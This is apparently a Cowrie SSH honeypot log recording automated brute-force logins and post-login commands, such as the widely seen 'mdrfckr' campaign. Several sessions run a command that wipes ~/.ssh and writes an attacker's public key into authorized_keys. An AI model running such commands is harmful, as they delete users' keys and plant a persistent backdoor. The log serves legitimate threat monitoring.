sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:50:14.572138Z","src_ip":"51.250.72.176","session":"065fd0df1013"}
{"eventid":"cowrie.login.failed","username":"huser","password":"123","message":"login attempt [huser/123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:50:14.739367Z","src_ip":"51.250.72.176","session":"065fd0df1013"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:50:15.773559Z","src_ip":"51.250.72.176","session":"065fd0df1013"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":54716,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfebbcfd0f6c","protocol":"ssh","message":"New connection: 5.202.105.236:54716 (1.2.3.4:22) [session: dfebbcfd0f6c]","sensor":"my-vps","timestamp":"2025-09-09T00:50:41.953407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:50:41.965007Z","src_ip":"5.202.105.236","session":"dfebbcfd0f6c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:50:42.112101Z","src_ip":"5.202.105.236","session":"dfebbcfd0f6c"}
{"eventid":"cowrie.login.failed","username":"redis","password":"111111","message":"login attempt [redis/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T00:50:42.716529Z","src_ip":"5.202.105.236","session":"dfebbcfd0f6c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:50:43.876617Z","src_ip":"5.202.105.236","session":"dfebbcfd0f6c"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":59680,"dst_ip":"1.2.3.4","dst_port":22,"session":"2321caa9806d","protocol":"ssh","message":"New connection: 152.32.129.236:59680 (1.2.3.4:22) [session: 2321caa9806d]","sensor":"my-vps","timestamp":"2025-09-09T00:50:58.010236Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:50:58.011079Z","src_ip":"152.32.129.236","session":"2321caa9806d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:50:58.206151Z","src_ip":"152.32.129.236","session":"2321caa9806d"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":51092,"dst_ip":"1.2.3.4","dst_port":22,"session":"c38b74eb1b0f","protocol":"ssh","message":"New connection: 103.100.209.195:51092 (1.2.3.4:22) [session: c38b74eb1b0f]","sensor":"my-vps","timestamp":"2025-09-09T00:50:59.441638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:50:59.443279Z","src_ip":"103.100.209.195","session":"c38b74eb1b0f"}
{"eventid":"cowrie.login.failed","username":"roo","password":"1234567","message":"login attempt [roo/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T00:50:59.545856Z","src_ip":"152.32.129.236","session":"2321caa9806d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:50:59.649563Z","src_ip":"103.100.209.195","session":"c38b74eb1b0f"}
{"eventid":"cowrie.login.success","username":"root","password":"P@$$w0rD","message":"login attempt [root/P@$$w0rD] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:51:00.517855Z","src_ip":"103.100.209.195","session":"c38b74eb1b0f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:51:00.742250Z","src_ip":"152.32.129.236","session":"2321caa9806d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:51:00.953561Z","src_ip":"103.100.209.195","session":"c38b74eb1b0f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:51:00.954325Z","src_ip":"103.100.209.195","session":"c38b74eb1b0f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:51:00.955377Z","src_ip":"103.100.209.195","session":"c38b74eb1b0f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:51:01.164111Z","src_ip":"103.100.209.195","session":"c38b74eb1b0f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:51:01.684025Z","src_ip":"103.100.209.195","session":"c38b74eb1b0f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:51:01.684778Z","src_ip":"103.100.209.195","session":"c38b74eb1b0f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:51:01.901125Z","src_ip":"103.100.209.195","session":"c38b74eb1b0f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:51:01.902150Z","src_ip":"103.100.209.195","session":"c38b74eb1b0f"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":51626,"dst_ip":"1.2.3.4","dst_port":22,"session":"e26715446e33","protocol":"ssh","message":"New connection: 103.100.209.195:51626 (1.2.3.4:22) [session: e26715446e33]","sensor":"my-vps","timestamp":"2025-09-09T00:51:02.116636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:51:02.121568Z","src_ip":"103.100.209.195","session":"e26715446e33"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:51:02.331851Z","src_ip":"103.100.209.195","session":"e26715446e33"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:51:03.183397Z","src_ip":"103.100.209.195","session":"e26715446e33"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:51:04.404647Z","src_ip":"103.100.209.195","session":"e26715446e33"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":52106,"dst_ip":"1.2.3.4","dst_port":22,"session":"05c9c6569a92","protocol":"ssh","message":"New connection: 103.100.209.195:52106 (1.2.3.4:22) [session: 05c9c6569a92]","sensor":"my-vps","timestamp":"2025-09-09T00:51:04.590757Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:51:04.599709Z","src_ip":"103.100.209.195","session":"05c9c6569a92"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:51:04.795055Z","src_ip":"103.100.209.195","session":"05c9c6569a92"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:51:05.585367Z","src_ip":"103.100.209.195","session":"05c9c6569a92"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:51:05.790034Z","src_ip":"103.100.209.195","session":"05c9c6569a92"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:51:05.799050Z","src_ip":"103.100.209.195","session":"c38b74eb1b0f"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":58370,"dst_ip":"1.2.3.4","dst_port":22,"session":"058e32b50a5f","protocol":"ssh","message":"New connection: 43.156.132.147:58370 (1.2.3.4:22) [session: 058e32b50a5f]","sensor":"my-vps","timestamp":"2025-09-09T00:51:16.244167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:51:16.244820Z","src_ip":"43.156.132.147","session":"058e32b50a5f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:51:16.498355Z","src_ip":"43.156.132.147","session":"058e32b50a5f"}
{"eventid":"cowrie.login.success","username":"root","password":"zxcvb12345","message":"login attempt [root/zxcvb12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:51:17.551920Z","src_ip":"43.156.132.147","session":"058e32b50a5f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:51:18.079359Z","src_ip":"43.156.132.147","session":"058e32b50a5f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:51:18.080113Z","src_ip":"43.156.132.147","session":"058e32b50a5f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:51:18.081165Z","src_ip":"43.156.132.147","session":"058e32b50a5f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:51:18.336155Z","src_ip":"43.156.132.147","session":"058e32b50a5f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:51:18.942524Z","src_ip":"43.156.132.147","session":"058e32b50a5f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:51:18.943316Z","src_ip":"43.156.132.147","session":"058e32b50a5f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:51:19.199352Z","src_ip":"43.156.132.147","session":"058e32b50a5f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:51:19.200293Z","src_ip":"43.156.132.147","session":"058e32b50a5f"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":52482,"dst_ip":"1.2.3.4","dst_port":22,"session":"02be8e0fb273","protocol":"ssh","message":"New connection: 43.156.132.147:52482 (1.2.3.4:22) [session: 02be8e0fb273]","sensor":"my-vps","timestamp":"2025-09-09T00:51:19.451315Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:51:19.452305Z","src_ip":"43.156.132.147","session":"02be8e0fb273"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:51:19.702480Z","src_ip":"43.156.132.147","session":"02be8e0fb273"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:51:20.749585Z","src_ip":"43.156.132.147","session":"02be8e0fb273"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:51:22.013246Z","src_ip":"43.156.132.147","session":"02be8e0fb273"}
